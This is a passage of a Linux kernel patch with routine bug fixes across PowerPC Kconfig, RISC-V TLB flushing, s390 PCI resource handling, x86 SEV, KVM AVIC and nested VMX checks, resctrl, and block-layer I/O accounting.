+ config 405_CPU
+ 	bool "40x family"
+ 	depends on 40x
++	depends on !CC_IS_CLANG
+ 
+ config 440_CPU
+ 	bool "440 (44x family)"
+@@ -201,22 +203,27 @@ config 440_CPU
+ config 464_CPU
+ 	bool "464 (44x family)"
+ 	depends on 44x
++	depends on !CC_IS_CLANG
+ 
+ config 476_CPU
+ 	bool "476 (47x family)"
+ 	depends on PPC_47x
++	depends on !CC_IS_CLANG
+ 
+ config 860_CPU
+ 	bool "8xx family"
+ 	depends on PPC_8xx
++	depends on !CC_IS_CLANG
+ 
+ config E300C2_CPU
+ 	bool "e300c2 (832x)"
+ 	depends on PPC_BOOK3S_32
++	depends on !CC_IS_CLANG
+ 
+ config E300C3_CPU
+ 	bool "e300c3 (831x)"
+ 	depends on PPC_BOOK3S_32
++	depends on !CC_IS_CLANG
+ 
+ config G4_CPU
+ 	bool "G4 (74xx)"
+@@ -233,13 +240,12 @@ config E500MC_CPU
+ 
+ config TOOLCHAIN_DEFAULT_CPU
+ 	bool "Rely on the toolchain's implicit default CPU"
+-	depends on PPC32
+ 
+ endchoice
+ 
+ config TARGET_CPU_BOOL
+ 	bool
+-	default !GENERIC_CPU && !TOOLCHAIN_DEFAULT_CPU
++	default !TOOLCHAIN_DEFAULT_CPU
+ 
+ config TARGET_CPU
+ 	string
+@@ -251,6 +257,10 @@ config TARGET_CPU
+ 	default "power8" if POWER8_CPU
+ 	default "power9" if POWER9_CPU
+ 	default "power10" if POWER10_CPU
++	default "e5500" if E5500_CPU
++	default "e6500" if E6500_CPU
++	default "power4" if POWERPC64_CPU && !CPU_LITTLE_ENDIAN
++	default "power8" if POWERPC64_CPU && CPU_LITTLE_ENDIAN
+ 	default "405" if 405_CPU
+ 	default "440" if 440_CPU
+ 	default "464" if 464_CPU
+diff --git a/arch/riscv/include/asm/mmu.h b/arch/riscv/include/asm/mmu.h
+index 5ff1f19fd45c2..0099dc1161683 100644
+--- a/arch/riscv/include/asm/mmu.h
++++ b/arch/riscv/include/asm/mmu.h
+@@ -19,8 +19,6 @@ typedef struct {
+ #ifdef CONFIG_SMP
+ 	/* A local icache flush is needed before user execution can resume. */
+ 	cpumask_t icache_stale_mask;
+-	/* A local tlb flush is needed before user execution can resume. */
+-	cpumask_t tlb_stale_mask;
+ #endif
+ } mm_context_t;
+ 
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 907b9efd39a87..801019381dea3 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -22,24 +22,6 @@ static inline void local_flush_tlb_page(unsigned long addr)
+ {
+ 	ALT_FLUSH_TLB_PAGE(__asm__ __volatile__ ("sfence.vma %0" : : "r" (addr) : "memory"));
+ }
+-
+-static inline void local_flush_tlb_all_asid(unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma x0, %0"
+-			:
+-			: "r" (asid)
+-			: "memory");
+-}
+-
+-static inline void local_flush_tlb_page_asid(unsigned long addr,
+-		unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma %0, %1"
+-			:
+-			: "r" (addr), "r" (asid)
+-			: "memory");
+-}
+-
+ #else /* CONFIG_MMU */
+ #define local_flush_tlb_all()			do { } while (0)
+ #define local_flush_tlb_page(addr)		do { } while (0)
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 80ce9caba8d22..0f784e3d307bb 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -196,16 +196,6 @@ switch_mm_fast:
+ 
+ 	if (need_flush_tlb)
+ 		local_flush_tlb_all();
+-#ifdef CONFIG_SMP
+-	else {
+-		cpumask_t *mask = &mm->context.tlb_stale_mask;
+-
+-		if (cpumask_test_cpu(cpu, mask)) {
+-			cpumask_clear_cpu(cpu, mask);
+-			local_flush_tlb_all_asid(cntx & asid_mask);
+-		}
+-	}
+-#endif
+ }
+ 
+ static void set_mm_noasid(struct mm_struct *mm)
+@@ -215,12 +205,24 @@ static void set_mm_noasid(struct mm_struct *mm)
+ 	local_flush_tlb_all();
+ }
+ 
+-static inline void set_mm(struct mm_struct *mm, unsigned int cpu)
++static inline void set_mm(struct mm_struct *prev,
++			  struct mm_struct *next, unsigned int cpu)
+ {
+-	if (static_branch_unlikely(&use_asid_allocator))
+-		set_mm_asid(mm, cpu);
+-	else
+-		set_mm_noasid(mm);
++	/*
++	 * The mm_cpumask indicates which harts' TLBs contain the virtual
++	 * address mapping of the mm. Compared to noasid, using asid
++	 * can't guarantee that stale TLB entries are invalidated because
++	 * the asid mechanism wouldn't flush TLB for every switch_mm for
++	 * performance. So when using asid, keep all CPUs footmarks in
++	 * cpumask() until mm reset.
++	 */
++	cpumask_set_cpu(cpu, mm_cpumask(next));
++	if (static_branch_unlikely(&use_asid_allocator)) {
++		set_mm_asid(next, cpu);
++	} else {
++		cpumask_clear_cpu(cpu, mm_cpumask(prev));
++		set_mm_noasid(next);
++	}
+ }
+ 
+ static int __init asids_init(void)
+@@ -274,7 +276,8 @@ static int __init asids_init(void)
+ }
+ early_initcall(asids_init);
+ #else
+-static inline void set_mm(struct mm_struct *mm, unsigned int cpu)
++static inline void set_mm(struct mm_struct *prev,
++			  struct mm_struct *next, unsigned int cpu)
+ {
+ 	/* Nothing to do here when there is no MMU */
+ }
+@@ -327,10 +330,7 @@ void switch_mm(struct mm_struct *prev, struct mm_struct *next,
+ 	 */
+ 	cpu = smp_processor_id();
+ 
+-	cpumask_clear_cpu(cpu, mm_cpumask(prev));
+-	cpumask_set_cpu(cpu, mm_cpumask(next));
+-
+-	set_mm(next, cpu);
++	set_mm(prev, next, cpu);
+ 
+ 	flush_icache_deferred(next, cpu);
+ }
+diff --git a/arch/riscv/mm/fault.c b/arch/riscv/mm/fault.c
+index eb0774d9c03b1..4b9953b47d81a 100644
+--- a/arch/riscv/mm/fault.c
++++ b/arch/riscv/mm/fault.c
+@@ -143,6 +143,8 @@ static inline void vmalloc_fault(struct pt_regs *regs, int code, unsigned long a
+ 		no_context(regs, addr);
+ 		return;
+ 	}
++	if (pud_leaf(*pud_k))
++		goto flush_tlb;
+ 
+ 	/*
+ 	 * Since the vmalloc area is global, it is unnecessary
+@@ -153,6 +155,8 @@ static inline void vmalloc_fault(struct pt_regs *regs, int code, unsigned long a
+ 		no_context(regs, addr);
+ 		return;
+ 	}
++	if (pmd_leaf(*pmd_k))
++		goto flush_tlb;
+ 
+ 	/*
+ 	 * Make sure the actual PTE exists as well to
+@@ -172,6 +176,7 @@ static inline void vmalloc_fault(struct pt_regs *regs, int code, unsigned long a
+ 	 * ordering constraint, not a cache flush; it is
+ 	 * necessary even after writing invalid entries.
+ 	 */
++flush_tlb:
+ 	local_flush_tlb_page(addr);
+ }
+ 
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index ce7dfc81bb3fe..37ed760d007c3 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -5,7 +5,23 @@
+ #include <linux/sched.h>
+ #include <asm/sbi.h>
+ #include <asm/mmu_context.h>
+-#include <asm/tlbflush.h>
++
++static inline void local_flush_tlb_all_asid(unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma x0, %0"
++			:
++			: "r" (asid)
++			: "memory");
++}
++
++static inline void local_flush_tlb_page_asid(unsigned long addr,
++		unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma %0, %1"
++			:
++			: "r" (addr), "r" (asid)
++			: "memory");
++}
+ 
+ void flush_tlb_all(void)
+ {
+@@ -15,7 +31,6 @@ void flush_tlb_all(void)
+ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 				  unsigned long size, unsigned long stride)
+ {
+-	struct cpumask *pmask = &mm->context.tlb_stale_mask;
+ 	struct cpumask *cmask = mm_cpumask(mm);
+ 	unsigned int cpuid;
+ 	bool broadcast;
+@@ -29,15 +44,6 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+ 		unsigned long asid = atomic_long_read(&mm->context.id);
+ 
+-		/*
+-		 * TLB will be immediately flushed on harts concurrently
+-		 * executing this MM context. TLB flush on other harts
+-		 * is deferred until this MM context migrates there.
+-		 */
+-		cpumask_setall(pmask);
+-		cpumask_clear_cpu(cpuid, pmask);
+-		cpumask_andnot(pmask, pmask, cmask);
+-
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
+ 		} else if (size <= stride) {
+diff --git a/arch/s390/boot/ipl_report.c b/arch/s390/boot/ipl_report.c
+index 9b14045065b6e..74b5cd2648622 100644
+--- a/arch/s390/boot/ipl_report.c
++++ b/arch/s390/boot/ipl_report.c
+@@ -57,11 +57,19 @@ repeat:
+ 	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size &&
+ 	    intersects(initrd_data.start, initrd_data.size, safe_addr, size))
+ 		safe_addr = initrd_data.start + initrd_data.size;
++	if (intersects(safe_addr, size, (unsigned long)comps, comps->len)) {
++		safe_addr = (unsigned long)comps + comps->len;
++		goto repeat;
++	}
+ 	for_each_rb_entry(comp, comps)
+ 		if (intersects(safe_addr, size, comp->addr, comp->len)) {
+ 			safe_addr = comp->addr + comp->len;
+ 			goto repeat;
+ 		}
++	if (intersects(safe_addr, size, (unsigned long)certs, certs->len)) {
++		safe_addr = (unsigned long)certs + certs->len;
++		goto repeat;
++	}
+ 	for_each_rb_entry(cert, certs)
+ 		if (intersects(safe_addr, size, cert->addr, cert->len)) {
+ 			safe_addr = cert->addr + cert->len;
+diff --git a/arch/s390/pci/pci.c b/arch/s390/pci/pci.c
+index ef38b1514c77a..e16afacc8fd1b 100644
+--- a/arch/s390/pci/pci.c
++++ b/arch/s390/pci/pci.c
+@@ -544,8 +544,7 @@ static struct resource *__alloc_res(struct zpci_dev *zdev, unsigned long start,
+ 	return r;
+ }
+ 
+-int zpci_setup_bus_resources(struct zpci_dev *zdev,
+-			     struct list_head *resources)
++int zpci_setup_bus_resources(struct zpci_dev *zdev)
+ {
+ 	unsigned long addr, size, flags;
+ 	struct resource *res;
+@@ -581,7 +580,6 @@ int zpci_setup_bus_resources(struct zpci_dev *zdev,
+ 			return -ENOMEM;
+ 		}
+ 		zdev->bars[i].res = res;
+-		pci_add_resource(resources, res);
+ 	}
+ 	zdev->has_resources = 1;
+ 
+@@ -590,17 +588,23 @@ int zpci_setup_bus_resources(struct zpci_dev *zdev,
+ 
+ static void zpci_cleanup_bus_resources(struct zpci_dev *zdev)
+ {
++	struct resource *res;
+ 	int i;
+ 
++	pci_lock_rescan_remove();
+ 	for (i = 0; i < PCI_STD_NUM_BARS; i++) {
+-		if (!zdev->bars[i].size || !zdev->bars[i].res)
++		res = zdev->bars[i].res;
++		if (!res)
+ 			continue;
+ 
++		release_resource(res);
++		pci_bus_remove_resource(zdev->zbus->bus, res);
+ 		zpci_free_iomap(zdev, zdev->bars[i].map_idx);
+-		release_resource(zdev->bars[i].res);
+-		kfree(zdev->bars[i].res);
++		zdev->bars[i].res = NULL;
++		kfree(res);
+ 	}
+ 	zdev->has_resources = 0;
++	pci_unlock_rescan_remove();
+ }
+ 
+ int pcibios_device_add(struct pci_dev *pdev)
+diff --git a/arch/s390/pci/pci_bus.c b/arch/s390/pci/pci_bus.c
+index 6a8da1b742ae5..a99926af2b69a 100644
+--- a/arch/s390/pci/pci_bus.c
++++ b/arch/s390/pci/pci_bus.c
+@@ -41,9 +41,7 @@ static int zpci_nb_devices;
+  */
+ static int zpci_bus_prepare_device(struct zpci_dev *zdev)
+ {
+-	struct resource_entry *window, *n;
+-	struct resource *res;
+-	int rc;
++	int rc, i;
+ 
+ 	if (!zdev_enabled(zdev)) {
+ 		rc = zpci_enable_device(zdev);
+@@ -57,10 +55,10 @@ static int zpci_bus_prepare_device(struct zpci_dev *zdev)
+ 	}
+ 
+ 	if (!zdev->has_resources) {
+-		zpci_setup_bus_resources(zdev, &zdev->zbus->resources);
+-		resource_list_for_each_entry_safe(window, n, &zdev->zbus->resources) {
+-			res = window->res;
+-			pci_bus_add_resource(zdev->zbus->bus, res, 0);
++		zpci_setup_bus_resources(zdev);
++		for (i = 0; i < PCI_STD_NUM_BARS; i++) {
++			if (zdev->bars[i].res)
++				pci_bus_add_resource(zdev->zbus->bus, zdev->bars[i].res, 0);
+ 		}
+ 	}
+ 
+diff --git a/arch/s390/pci/pci_bus.h b/arch/s390/pci/pci_bus.h
+index e96c9860e0644..af9f0ac79a1b1 100644
+--- a/arch/s390/pci/pci_bus.h
++++ b/arch/s390/pci/pci_bus.h
+@@ -30,8 +30,7 @@ static inline void zpci_zdev_get(struct zpci_dev *zdev)
+ 
+ int zpci_alloc_domain(int domain);
+ void zpci_free_domain(int domain);
+-int zpci_setup_bus_resources(struct zpci_dev *zdev,
+-			     struct list_head *resources);
++int zpci_setup_bus_resources(struct zpci_dev *zdev);
+ 
+ static inline struct zpci_dev *zdev_from_bus(struct pci_bus *bus,
+ 					     unsigned int devfn)
+diff --git a/arch/x86/include/asm/sev-common.h b/arch/x86/include/asm/sev-common.h
+index b8357d6ecd47e..b63be696b776a 100644
+--- a/arch/x86/include/asm/sev-common.h
++++ b/arch/x86/include/asm/sev-common.h
+@@ -128,8 +128,9 @@ struct snp_psc_desc {
+ 	struct psc_entry entries[VMGEXIT_PSC_MAX_ENTRY];
+ } __packed;
+ 
+-/* Guest message request error code */
++/* Guest message request error codes */
+ #define SNP_GUEST_REQ_INVALID_LEN	BIT_ULL(32)
++#define SNP_GUEST_REQ_ERR_BUSY		BIT_ULL(33)
+ 
+ #define GHCB_MSR_TERM_REQ		0x100
+ #define GHCB_MSR_TERM_REASON_SET_POS	12
+diff --git a/arch/x86/include/asm/svm.h b/arch/x86/include/asm/svm.h
+index cb1ee53ad3b18..770dcf75eaa97 100644
+--- a/arch/x86/include/asm/svm.h
++++ b/arch/x86/include/asm/svm.h
+@@ -261,20 +261,22 @@ enum avic_ipi_failure_cause {
+ 	AVIC_IPI_FAILURE_INVALID_BACKING_PAGE,
+ };
+ 
+-#define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(9, 0)
++#define AVIC_PHYSICAL_MAX_INDEX_MASK	GENMASK_ULL(8, 0)
+ 
+ /*
+- * For AVIC, the max index allowed for physical APIC ID
+- * table is 0xff (255).
++ * For AVIC, the max index allowed for physical APIC ID table is 0xfe (254), as
++ * 0xff is a broadcast to all CPUs, i.e. can't be targeted individually.
+  */
+ #define AVIC_MAX_PHYSICAL_ID		0XFEULL
+ 
+ /*
+- * For x2AVIC, the max index allowed for physical APIC ID
+- * table is 0x1ff (511).
++ * For x2AVIC, the max index allowed for physical APIC ID table is 0x1ff (511).
+  */
+ #define X2AVIC_MAX_PHYSICAL_ID		0x1FFUL
+ 
++static_assert((AVIC_MAX_PHYSICAL_ID & AVIC_PHYSICAL_MAX_INDEX_MASK) == AVIC_MAX_PHYSICAL_ID);
++static_assert((X2AVIC_MAX_PHYSICAL_ID & AVIC_PHYSICAL_MAX_INDEX_MASK) == X2AVIC_MAX_PHYSICAL_ID);
++
+ #define AVIC_HPA_MASK	~((0xFFFULL << 52) | 0xFFF)
+ #define VMCB_AVIC_APIC_BAR_MASK		0xFFFFFFFFFF000ULL
+ 
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index 2c8ec5c717121..e228d58ee2645 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -2365,6 +2365,7 @@ static void mce_restart(void)
+ {
+ 	mce_timer_delete_all();
+ 	on_each_cpu(mce_cpu_restart, NULL, 1);
++	mce_schedule_work();
+ }
+ 
+ /* Toggle features for corrected errors */
+diff --git a/arch/x86/kernel/cpu/resctrl/ctrlmondata.c b/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
+index 1df0e3262bcae..bcdc679dad4e5 100644
+--- a/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
++++ b/arch/x86/kernel/cpu/resctrl/ctrlmondata.c
+@@ -373,7 +373,6 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ {
+ 	struct resctrl_schema *s;
+ 	struct rdtgroup *rdtgrp;
+-	struct rdt_domain *dom;
+ 	struct rdt_resource *r;
+ 	char *tok, *resname;
+ 	int ret = 0;
+@@ -402,10 +401,7 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ 		goto out;
+ 	}
+ 
+-	list_for_each_entry(s, &resctrl_schema_all, list) {
+-		list_for_each_entry(dom, &s->res->domains, list)
+-			memset(dom->staged_config, 0, sizeof(dom->staged_config));
+-	}
++	rdt_staged_configs_clear();
+ 
+ 	while ((tok = strsep(&buf, "\n")) != NULL) {
+ 		resname = strim(strsep(&tok, ":"));
+@@ -450,6 +446,7 @@ ssize_t rdtgroup_schemata_write(struct kernfs_open_file *of,
+ 	}
+ 
+ out:
++	rdt_staged_configs_clear();
+ 	rdtgroup_kn_unlock(of->kn);
+ 	cpus_read_unlock();
+ 	return ret ?: nbytes;
+diff --git a/arch/x86/kernel/cpu/resctrl/internal.h b/arch/x86/kernel/cpu/resctrl/internal.h
+index 5ebd28e6aa0ca..f43eb7340ca5f 100644
+--- a/arch/x86/kernel/cpu/resctrl/internal.h
++++ b/arch/x86/kernel/cpu/resctrl/internal.h
+@@ -527,5 +527,6 @@ bool has_busy_rmid(struct rdt_resource *r, struct rdt_domain *d);
+ void __check_limbo(struct rdt_domain *d, bool force_free);
+ void rdt_domain_reconfigure_cdp(struct rdt_resource *r);
+ void __init thread_throttle_mode_init(void);
++void rdt_staged_configs_clear(void);
+ 
+ #endif /* _ASM_X86_RESCTRL_INTERNAL_H */
+diff --git a/arch/x86/kernel/cpu/resctrl/rdtgroup.c b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+index 87b670d540b84..c7f1c7cb1963b 100644
+--- a/arch/x86/kernel/cpu/resctrl/rdtgroup.c
++++ b/arch/x86/kernel/cpu/resctrl/rdtgroup.c
+@@ -78,6 +78,19 @@ void rdt_last_cmd_printf(const char *fmt, ...)
+ 	va_end(ap);
+ }
+ 
++void rdt_staged_configs_clear(void)
++{
++	struct rdt_resource *r;
++	struct rdt_domain *dom;
++
++	lockdep_assert_held(&rdtgroup_mutex);
++
++	for_each_alloc_capable_rdt_resource(r) {
++		list_for_each_entry(dom, &r->domains, list)
++			memset(dom->staged_config, 0, sizeof(dom->staged_config));
++	}
++}
++
+ /*
+  * Trivial allocator for CLOSIDs. Since h/w only supports a small number,
+  * we can keep a bitmap of free CLOSIDs in a single integer.
+@@ -2851,7 +2864,9 @@ static int rdtgroup_init_alloc(struct rdtgroup *rdtgrp)
+ {
+ 	struct resctrl_schema *s;
+ 	struct rdt_resource *r;
+-	int ret;
++	int ret = 0;
++
++	rdt_staged_configs_clear();
+ 
+ 	list_for_each_entry(s, &resctrl_schema_all, list) {
+ 		r = s->res;
+@@ -2862,20 +2877,22 @@ static int rdtgroup_init_alloc(struct rdtgroup *rdtgrp)
+ 		} else {
+ 			ret = rdtgroup_init_cat(s, rdtgrp->closid);
+ 			if (ret < 0)
+-				return ret;
++				goto out;
+ 		}
+ 
+ 		ret = resctrl_arch_update_domains(r, rdtgrp->closid);
+ 		if (ret < 0) {
+ 			rdt_last_cmd_puts("Failed to initialize allocations\n");
+-			return ret;
++			goto out;
+ 		}
+ 
+ 	}
+ 
+ 	rdtgrp->mode = RDT_MODE_SHAREABLE;
+ 
+-	return 0;
++out:
++	rdt_staged_configs_clear();
++	return ret;
+ }
+ 
+ static int mkdir_rdt_prepare(struct kernfs_node *parent_kn,
+diff --git a/arch/x86/kernel/ftrace_64.S b/arch/x86/kernel/ftrace_64.S
+index 1265ad519249c..fb4f1e01b64a2 100644
+--- a/arch/x86/kernel/ftrace_64.S
++++ b/arch/x86/kernel/ftrace_64.S
+@@ -136,10 +136,12 @@ SYM_TYPED_FUNC_START(ftrace_stub)
+ 	RET
+ SYM_FUNC_END(ftrace_stub)
+ 
++#ifdef CONFIG_FUNCTION_GRAPH_TRACER
+ SYM_TYPED_FUNC_START(ftrace_stub_graph)
+ 	CALL_DEPTH_ACCOUNT
+ 	RET
+ SYM_FUNC_END(ftrace_stub_graph)
++#endif
+ 
+ #ifdef CONFIG_DYNAMIC_FTRACE
+ 
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index 679026a640efd..3f664ab277c49 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -2183,9 +2183,6 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	struct ghcb *ghcb;
+ 	int ret;
+ 
+-	if (!cc_platform_has(CC_ATTR_GUEST_SEV_SNP))
+-		return -ENODEV;
+-
+ 	if (!fw_err)
+ 		return -EINVAL;
+ 
+@@ -2212,15 +2209,26 @@ int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned
+ 	if (ret)
+ 		goto e_put;
+ 
+-	if (ghcb->save.sw_exit_info_2) {
+-		/* Number of expected pages are returned in RBX */
+-		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST &&
+-		    ghcb->save.sw_exit_info_2 == SNP_GUEST_REQ_INVALID_LEN)
+-			input->data_npages = ghcb_get_rbx(ghcb);
++	*fw_err = ghcb->save.sw_exit_info_2;
++	switch (*fw_err) {
++	case 0:
++		break;
+ 
+-		*fw_err = ghcb->save.sw_exit_info_2;
++	case SNP_GUEST_REQ_ERR_BUSY:
++		ret = -EAGAIN;
++		break;
+ 
++	case SNP_GUEST_REQ_INVALID_LEN:
++		/* Number of expected pages are returned in RBX */
++		if (exit_code == SVM_VMGEXIT_EXT_GUEST_REQUEST) {
++			input->data_npages = ghcb_get_rbx(ghcb);
++			ret = -ENOSPC;
++			break;
++		}
++		fallthrough;
++	default:
+ 		ret = -EIO;
++		break;
+ 	}
+ 
+ e_put:
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index 97ad0661f9639..e910ec5a0cc0b 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -27,19 +27,29 @@
+ #include "irq.h"
+ #include "svm.h"
+ 
+-/* AVIC GATAG is encoded using VM and VCPU IDs */
+-#define AVIC_VCPU_ID_BITS		8
+-#define AVIC_VCPU_ID_MASK		((1 << AVIC_VCPU_ID_BITS) - 1)
++/*
++ * Encode the arbitrary VM ID and the vCPU's default APIC ID, i.e the vCPU ID,
++ * into the GATag so that KVM can retrieve the correct vCPU from a GALog entry
++ * if an interrupt can't be delivered, e.g. because the vCPU isn't running.
++ *
++ * For the vCPU ID, use however many bits are currently allowed for the max
++ * guest physical APIC ID (limited by the size of the physical ID table), and
++ * use whatever bits remain to assign arbitrary AVIC IDs to VMs.  Note, the
++ * size of the GATag is defined by hardware (32 bits), but is an opaque value
++ * as far as hardware is concerned.
++ */
++#define AVIC_VCPU_ID_MASK		AVIC_PHYSICAL_MAX_INDEX_MASK
+ 
+-#define AVIC_VM_ID_BITS			24
+-#define AVIC_VM_ID_NR			(1 << AVIC_VM_ID_BITS)
+-#define AVIC_VM_ID_MASK			((1 << AVIC_VM_ID_BITS) - 1)
++#define AVIC_VM_ID_SHIFT		HWEIGHT32(AVIC_PHYSICAL_MAX_INDEX_MASK)
++#define AVIC_VM_ID_MASK			(GENMASK(31, AVIC_VM_ID_SHIFT) >> AVIC_VM_ID_SHIFT)
+ 
+-#define AVIC_GATAG(x, y)		(((x & AVIC_VM_ID_MASK) << AVIC_VCPU_ID_BITS) | \
++#define AVIC_GATAG(x, y)		(((x & AVIC_VM_ID_MASK) << AVIC_VM_ID_SHIFT) | \
+ 						(y & AVIC_VCPU_ID_MASK))
+-#define AVIC_GATAG_TO_VMID(x)		((x >> AVIC_VCPU_ID_BITS) & AVIC_VM_ID_MASK)
++#define AVIC_GATAG_TO_VMID(x)		((x >> AVIC_VM_ID_SHIFT) & AVIC_VM_ID_MASK)
+ #define AVIC_GATAG_TO_VCPUID(x)		(x & AVIC_VCPU_ID_MASK)
+ 
++static_assert(AVIC_GATAG(AVIC_VM_ID_MASK, AVIC_VCPU_ID_MASK) == -1u);
++
+ static bool force_avic;
+ module_param_unsafe(force_avic, bool, 0444);
+ 
+diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
+index d93c715cda6ab..bceb5ad409c63 100644
+--- a/arch/x86/kvm/vmx/nested.c
++++ b/arch/x86/kvm/vmx/nested.c
+@@ -3021,7 +3021,7 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 					struct vmcs12 *vmcs12,
+ 					enum vm_entry_failure_code *entry_failure_code)
+ {
+-	bool ia32e;
++	bool ia32e = !!(vmcs12->vm_entry_controls & VM_ENTRY_IA32E_MODE);
+ 
+ 	*entry_failure_code = ENTRY_FAIL_DEFAULT;
+ 
+@@ -3047,6 +3047,13 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 					   vmcs12->guest_ia32_perf_global_ctrl)))
+ 		return -EINVAL;
+ 
++	if (CC((vmcs12->guest_cr0 & (X86_CR0_PG | X86_CR0_PE)) == X86_CR0_PG))
++		return -EINVAL;
++
++	if (CC(ia32e && !(vmcs12->guest_cr4 & X86_CR4_PAE)) ||
++	    CC(ia32e && !(vmcs12->guest_cr0 & X86_CR0_PG)))
++		return -EINVAL;
++
+ 	/*
+ 	 * If the load IA32_EFER VM-entry control is 1, the following checks
+ 	 * are performed on the field for the IA32_EFER MSR:
+@@ -3058,7 +3065,6 @@ static int nested_vmx_check_guest_state(struct kvm_vcpu *vcpu,
+ 	 */
+ 	if (to_vmx(vcpu)->nested.nested_run_pending &&
+ 	    (vmcs12->vm_entry_controls & VM_ENTRY_LOAD_IA32_EFER)) {
+-		ia32e = (vmcs12->vm_entry_controls & VM_ENTRY_IA32E_MODE) != 0;
+ 		if (CC(!kvm_valid_efer(vcpu, vmcs12->guest_ia32_efer)) ||
+ 		    CC(ia32e != !!(vmcs12->guest_ia32_efer & EFER_LMA)) ||
+ 		    CC(((vmcs12->guest_cr0 & X86_CR0_PG) &&
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index 88cccd65029db..c6efcf559d882 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -600,7 +600,8 @@ void __init sme_enable(struct boot_params *bp)
+ 	cmdline_ptr = (const char *)((u64)bp->hdr.cmd_line_ptr |
+ 				     ((u64)bp->ext_cmd_line_ptr << 32));
+ 
+-	cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer));
++	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0)
++		return;
+ 
+ 	if (!strncmp(buffer, cmdline_on, sizeof(buffer)))
+ 		sme_me_mask = me_mask;
+diff --git a/block/blk-core.c b/block/blk-core.c
+index 5a0049215ee72..597293151cd11 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -946,16 +946,11 @@ again:
+ 	}
+ }
+ 
+-unsigned long bdev_start_io_acct(struct block_device *bdev,
+-				 unsigned int sectors, enum req_op op,
++unsigned long bdev_start_io_acct(struct block_device *bdev, enum req_op op,
+ 				 unsigned long start_time)
+ {
+-	const int sgrp = op_stat_group(op);
+-
+ 	part_stat_lock();
+ 	update_io_ticks(bdev, start_time, false);
+-	part_stat_inc(bdev, ios[sgrp]);
+-	part_stat_add(bdev, sectors[sgrp], sectors);
+ 	part_stat_local_inc(bdev, in_flight[op_is_write(op)]);
+ 	part_stat_unlock();
+ 
+@@ -971,13 +966,12 @@ EXPORT_SYMBOL(bdev_start_io_acct);
+  */
+ unsigned long bio_start_io_acct(struct bio *bio)
+ {
+-	return bdev_start_io_acct(bio->bi_bdev, bio_sectors(bio),
+-				  bio_op(bio), jiffies);
++	return bdev_start_io_acct(bio->bi_bdev, bio_op(bio), jiffies);
+ }
+ EXPORT_SYMBOL_GPL(bio_start_io_acct);
+ 
+ void bdev_end_io_acct(struct block_device *bdev, enum req_op op,
+-		      unsigned long start_time)
++		      unsigned int sectors, unsigned long start_time)
+ {
+ 	const int sgrp = op_stat_group(op);
+ 	unsigned long now = READ_ONCE(jiffies);
+@@ -985,6 +979,8 @@ void bdev_end_io_acct(struct block_device *bdev, enum req_op op,
+ 
+ 	part_stat_lock();
+ 	update_io_ticks(bdev, now, true);
++	part_stat_inc(bdev, ios[sgrp]);
++	part_stat_add(bdev, sectors[sgrp], sectors);
+ 	part_stat_add(bdev, nsecs[sgrp], jiffies_to_nsecs(duration));
+ 	part_stat_local_dec(bdev, in_flight[op_is_write(op)]);
+ 	part_stat_unlock();
+@@ -994,7 +990,7 @@ EXPORT_SYMBOL(bdev_end_io_acct);
+ void bio_end_io_acct_remapped(struct bio *bio, unsigned long start_time,
+ 			      struct block_device *orig_bdev)
+ {
+-	bdev_end_io_acct(orig_bdev, bio_op(bio), start_time);
++	bdev_end_io_acct(orig_bdev, bio_op(bio), bio_sectors(bio), start_time);
+ }
+ EXPORT_SYMBOL_GPL(bio_end_io_acct_remapped);
+ 
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index b9e3b558367f1..c021fb05161b9 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
